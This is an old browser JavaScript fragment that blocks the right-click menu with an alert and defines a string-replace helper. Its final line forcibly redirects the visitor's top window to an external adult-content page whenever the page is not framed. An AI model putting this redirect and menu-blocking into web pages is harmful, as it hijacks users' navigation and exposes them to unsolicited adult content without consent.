function mousedown(e) {
  if (parseInt(navigator.appVersion)>3) {
    var clickType=1;
    if (navigator.appName=="Netscape") clickType=e.which;
    else clickType=event.button;
    if (clickType != 1) { alert('The right-click menu is disabled.'); return false; }
    }
  return true;
}
if (parseInt(navigator.appVersion)>3) {
  document.onmousedown = mousedown;
  if (navigator.appName == "Netscape")
   document.captureEvents(Event.MOUSEDOWN);
}
function replace(string,text,by) {var strLength = string.length, txtLength = text.length;if ((strLength == 0) || (txtLength == 0)) return string;var i = string.indexOf(text);if ((!i) && (text != string.substring(0,txtLength))) return string;if (i == -1) return string;var newstr = string.substring(0,i) + by;if (i+txtLength < strLength)newstr += replace(string.substring(i+txtLength,strLength),text,by);return newstr;}var $referrer = document.referrer;if (top.location == self.location) {top.location = "http://www.internationalscope.com/celeb/playboy.php";}
